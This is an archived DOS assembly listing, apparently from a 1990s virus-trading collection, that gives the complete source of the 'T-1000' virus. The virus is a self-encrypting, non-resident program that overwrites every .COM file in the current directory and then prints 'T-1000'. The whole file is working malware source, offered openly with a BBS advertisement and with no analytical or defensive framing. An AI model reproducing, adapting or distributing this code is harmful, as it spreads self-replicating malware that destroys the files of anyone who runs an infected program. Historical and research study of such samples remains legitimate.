home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / ASM-T.ZIP / T-1000.ASM next >
Assembly Source File  |  1992-11-29  |  2KB  |  96 lines
  1. ;
  2. ;       T-1000 Virus
  3. ;
  4. ; This virus is a Non-Resident Overwriting Self-Encrypting .COM File Inctector.
  5. ; When an infected program is started, the virus will infect all files in the
  6. ; current directory and use the time counter for its encryption. It displays
  7. ; the text "T-1000" when it is ready infecting.
  8.  
  9. Code    Segment para 'code'
  10.         Assume Cs:Code,Ds:Code
  11.  
  12. Length  Equ Offset EndByte-Offset Main
  13.  
  14.         Org 100h
  15.  
  16. Main:   Mov Si,Offset Decrypt
  17.         Mov Di,Si
  18.         Mov Cl,Offset EndByte-Offset Decrypt
  19. On2:    Lodsb
  20.         Db 34h
  21. Crypt   Db 0
  22.         Stosb
  23.         Dec Cl
  24.         Cmp Cl,0ffh
  25.         Jne On2
  26.  
  27. Decrypt:
  28.         Mov Ah,4eh
  29.         Push Ax
  30.  
  31. Encr:
  32.         Mov Ah,2ch
  33.         Int 21h
  34.         Mov Crypt,Dl
  35.         Mov Si,Offset Decrypt
  36.         Mov Di,Offset EndByte+10
  37.         Mov Cx,Offset EndByte-Offset Decrypt
  38. On3:    Lodsb
  39.         Xor Al,Crypt
  40.         Stosb
  41.         Dec Cx
  42.         Cmp Cx,0ffffh
  43.         Jne On3
  44.  
  45.         Pop Ax
  46. On1:    Xor Cx,Cx
  47.         Mov Dx,Offset Nam
  48.         Int 21h
  49.         Jc  Einde
  50.  
  51.         Mov Ax,3d01h
  52.         Mov Dx,9eh
  53.         Int 21h
  54.         Mov Bx,Ax
  55.  
  56.         Mov Ah,40h
  57.         Push Ax
  58.         Mov Cx,Offset Decrypt-Offset Main
  59.         Mov Dx,Offset Main
  60.         Int 21h
  61.  
  62.         Pop Ax
  63.         Mov Cx,Offset EndByte-Offset Decrypt
  64.         Mov Dx,Offset EndByte+10
  65.         Int 21h
  66.  
  67.         Mov Ah,3eh
  68.         Int 21h
  69.  
  70.         Mov Ah,4fh
  71.         Push Ax
  72.         Jmp Short Encr
  73.  
  74. Einde:
  75.         Mov Ah,9
  76.         Mov Dx,Offset Msg
  77.         Push Cs
  78.         Pop Ds
  79.         Int 21h
  80.         Int 20h
  81.  
  82. Msg     Db 'T-1000$'
  83.  
  84. Nam     Db '*.Com',0
  85.  
  86. EndByte Db 0
  87.  
  88. Code    Ends
  89.         End Main
  90.  
  91.  
  92. ;  ─────────────────────────────────────────────────────────────────────────
  93. ;  ────────────────────> and Remember Don't Forget to Call <────────────────
  94. ;  ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
  95. ;  ─────────────────────────────────────────────────────────────────────────
  96.